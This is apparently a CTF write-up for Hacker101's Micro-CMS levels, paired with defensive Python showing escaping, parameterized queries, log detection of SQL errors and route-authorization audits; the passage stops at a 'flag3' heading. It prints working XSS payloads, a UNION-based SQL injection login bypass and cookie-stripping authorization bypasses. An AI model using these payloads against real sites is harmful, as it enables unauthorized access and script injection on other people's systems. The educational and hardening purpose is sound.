hacker101

A little something to get you started (Trivial (1))

The page source contains:

<style>
body {
background-image: url("background.png");
}
</style>

Requesting background.png returns the flag.

Micro-CMS v1 (Easy (2))

flag1

On the page edit view the URL looks like /page/edit/2, which suggests an injection point. Appending a single quote after the last digit makes the flag pop up.

flag2

In the page elements of the Markdown Test page you can see an HTML tag, and that tag is rendered as real markup. So try XSS.

Create a new page, enter <script>alert(1)</script> as the title, and click <-- Go Home; the flag pops up.

flag3

Similar to flag2, the article body is also vulnerable to XSS. Payload:

<img src=1 onerror=javascript:alert(1) />

The flag is then found in the page source.
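Both XSS findings above (flag2 in the title, flag3 in the body) come from the same root cause: user-supplied text is inserted into HTML without escaping. The following Python is an added example, not code from Micro-CMS or the Hacker101 project. It puts the vulnerable concatenation beside an escaped rendering, adds a body renderer that escapes first and only then applies a small emphasis syntax of its own (so formatting works without trusting raw HTML), and a regression check for templates. The two sample payloads are the ones quoted in this writeup; the function names and the **bold**/*italic* syntax are assumptions.

```python
import html
import re

# Constructed sample inputs: the two payloads quoted in this writeup.
SAMPLE_TITLE = "<script>alert(1)</script>"
SAMPLE_BODY = "<img src=1 onerror=javascript:alert(1) />"


def render_title_vulnerable(title):
    """What Micro-CMS v1 effectively does: the title lands in the HTML unchanged."""
    return "<h1>" + title + "</h1>"


def render_title_escaped(title):
    """Hardened form: every HTML metacharacter (<, >, &, quotes) is escaped first."""
    return "<h1>" + html.escape(title, quote=True) + "</h1>"


def render_body(body):
    """Escape first, then format.

    A body renderer can still offer formatting without passing raw HTML through:
    escape the whole string, then rewrite a small, hypothetical emphasis syntax
    (**bold**, *italic*) into tags generated here. Any '<img' or '<script' the
    user typed has already become '&lt;img' by the time formatting runs.
    """
    safe = html.escape(body, quote=True)
    safe = re.sub(r"\*\*(.+?)\*\*", r"<strong>\1</strong>", safe)
    safe = re.sub(r"(?<!\*)\*([^*]+?)\*(?!\*)", r"<em>\1</em>", safe)
    return "<p>" + safe + "</p>"


def has_active_content(rendered):
    """Cheap regression check for rendered output: a real script tag, or a real
    tag carrying an inline event-handler attribute. Escaped text has no '<', so
    it never matches even if it contains the word 'onerror='."""
    return bool(re.search(r"<script\b|<\w+[^>]*\son\w+\s*=", rendered, re.IGNORECASE))
```

Running `has_active_content` over every template's output in the test suite is a simple way to keep a fix like this from regressing when someone later "just needs" raw HTML in one field.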

flag4

Walking through page IDs shows that page 3 returns 404 while page 4 returns 403; requesting /page/edit/4 directly returns the flag.

Hints:

Flag0

  • Try creating a new page
  • How are pages indexed?
  • Look at the sequence of IDs
  • If the front door doesn’t open, try the window
  • In what ways can you retrieve page contents?

Flag1

  • Make sure you tamper with every input
  • Have you tested for the usual culprits? XSS, SQL injection, path injection
  • Bugs often occur when an input should always be one type and turns out to be another
  • Remember, form submissions aren’t the only inputs that come from browsers

Flag2

  • Sometimes a given input will affect more than one page
  • The bug you are looking for doesn’t exist in the most obvious place this input is shown

Flag3

  • Script tags are great, but what other options do you have?

Micro-CMS v2 (Moderate (3))

flag1

v2 ships with a changelog:

This version fixed the multitude of security flaws and general functionality bugs that plagued v1. Additionally, we added user authentication; we're still not sure why we didn't think about that the first time, but hindsight is 20/20. By default, users need to be an admin to add or edit pages now.

Create a new page now requires logging in.

Logging in with the username admin' (a trailing single quote) produces an error:

Traceback (most recent call last):
File "./main.py", line 145, in do_login
if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 255, in execute
self.errorhandler(self, exc, value)
File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
raise errorvalue
ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''admin''' at line 1")

The SQL statement is visible in the traceback:

'SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')

Use the payload:

Username: admin' union select 123 as password;--+
Password: 123

After logging in successfully, the Private Page shows the flag.
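The traceback above shows the whole problem: the username is formatted into the SQL string with %, so a quote in the input ends the string literal and the rest of the input is parsed as SQL. The following Python is an added example, not the Micro-CMS code: it reproduces that pattern against an in-memory SQLite table, puts the parameterized query beside it, and adds a small log check keyed on the 1064 syntax error the author saw, since that same error is what an injection attempt leaves in the application log. The table, the admin row, the log lines and the function names are constructed; the username payload is the writeup's own minus the trailing semicolon, because sqlite3 refuses more than one statement per execute call.

```python
import hmac
import sqlite3


# Constructed in-memory stand-in for an admins table; not the real Micro-CMS schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('webmaster', 'correct horse battery staple')")
    return conn


def login_vulnerable(conn, username, password):
    """Mirrors the pattern in the traceback: the username is spliced into the SQL
    text with % formatting, so a quote in it closes the string literal and
    whatever follows is parsed as SQL. Passwords are compared with ==, as the
    real code appears to do (plaintext storage is a separate problem kept here
    so the two login functions differ in exactly one respect)."""
    query = "SELECT password FROM admins WHERE username='%s'" % username
    rows = conn.execute(query).fetchall()
    if not rows:
        return False
    return rows[0][0] == password


def login_parameterized(conn, username, password):
    """Hardened form: the driver binds the value, so the username is data and can
    never change the shape of the query. compare_digest keeps the comparison
    constant-time (both values must be ASCII str or both bytes)."""
    rows = conn.execute(
        "SELECT password FROM admins WHERE username=?", (username,)
    ).fetchall()
    if not rows:
        return False
    return hmac.compare_digest(rows[0][0], password)


# The writeup's username payload, without the trailing ';' (sqlite3 allows only
# one statement per execute call, which would otherwise hide the point).
PAYLOAD_USERNAME = "admin' union select '123' as password -- "

# Detection side. Constructed sample log lines; the second one carries the same
# MariaDB error text the author saw in the HTTP response.
SAMPLE_LOG = [
    "POST /login 302 user=webmaster",
    'ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual ...")',
    "POST /login 500 user=admin'",
    "GET /page/1 200",
]

SQL_ERROR_MARKERS = ("You have an error in your SQL syntax", "ProgrammingError: (1064")


def sql_error_lines(log_lines):
    """Indexes of log lines carrying a database syntax error. A burst of these on
    a login or edit endpoint is a cheap, high-signal alert for injection probing,
    and the error text should never reach the client as it does here."""
    return [i for i, line in enumerate(log_lines)
            if any(marker in line for marker in SQL_ERROR_MARKERS)]
```

With the vulnerable function the payload logs in with password 123 because the UNION row is the only row returned; with the parameterized query the same string is just a username that matches nothing.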

flag2

The hint says:

What actions could you perform as a regular user on the last level, which you can't now?

The page edit view only lets you modify a page when logged in, but after capturing the underlying API request and stripping the cookie from it, the request still succeeds and returns the flag.

API request body:

POST:
title=test&body=123
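This flag and flag4 of v1 (page 4 returns 403 but /page/edit/4 is open) are the same bug: the authorization check sits on the view route and is missing on the edit route, so removing the cookie or going straight to the edit URL skips it. The Python below is an added example, not Micro-CMS code: it models a view handler that checks the session, the unchecked edit handler this writeup exploited, and a hardened version where a wrapper enforces login on every mutating handler, plus the audit a reviewer can run over the route table to find handlers that lack it. The session token, page ids, route names and handler signatures are all constructed.

```python
import copy
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


# Constructed session store and page table; token and page ids are invented.
SESSIONS = {"sess-1111": "webmaster"}
PAGES = {
    1: {"title": "Home", "body": "welcome", "private": False},
    4: {"title": "Private Page", "body": "admin only", "private": True},
}


def fresh_pages():
    """A private copy of the page table so each scenario starts clean."""
    return copy.deepcopy(PAGES)


def current_user(req):
    return SESSIONS.get(req.cookies.get("session"))


def view_page(req, pages, page_id):
    """The view route: private pages need a session, like the 403 on page 4."""
    page = pages.get(page_id)
    if page is None:
        return 404, "not found"
    if page["private"] and current_user(req) is None:
        return 403, "forbidden"
    return 200, page["title"]


def edit_page_vulnerable(req, pages, page_id):
    """The behaviour this writeup exploited: the edit route never asks who is
    calling, so a POST with the cookie removed still writes the page."""
    page = pages.get(page_id)
    if page is None:
        return 404, "not found"
    if req.method == "POST":
        page["title"] = req.form.get("title", page["title"])
        page["body"] = req.form.get("body", page["body"])
    return 200, page["title"]


def require_login(handler):
    """Hardened form: authorization lives in one wrapper that every mutating
    handler carries, rather than being re-implemented (or forgotten) per route.
    The marker attribute lets the audit below see which handlers are wrapped."""
    def wrapped(req, pages, page_id):
        if current_user(req) is None:
            return 403, "forbidden"
        return handler(req, pages, page_id)
    wrapped.login_required = True
    return wrapped


edit_page = require_login(edit_page_vulnerable)

# Route table with mutating routes marked; the audit is the reviewer's check.
ROUTES = {
    "GET /page/<id>": (view_page, False),
    "POST /page/edit/<id>": (edit_page, True),
}


def unprotected_mutating_routes(routes):
    """Return the mutating routes whose handler does not carry the login wrapper."""
    return [name for name, (handler, mutating) in routes.items()
            if mutating and not getattr(handler, "login_required", False)]
```

The audit is the part worth keeping in CI: a test that asserts `unprotected_mutating_routes(ROUTES) == []` fails the build the moment someone adds a POST route without the wrapper.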

flag3
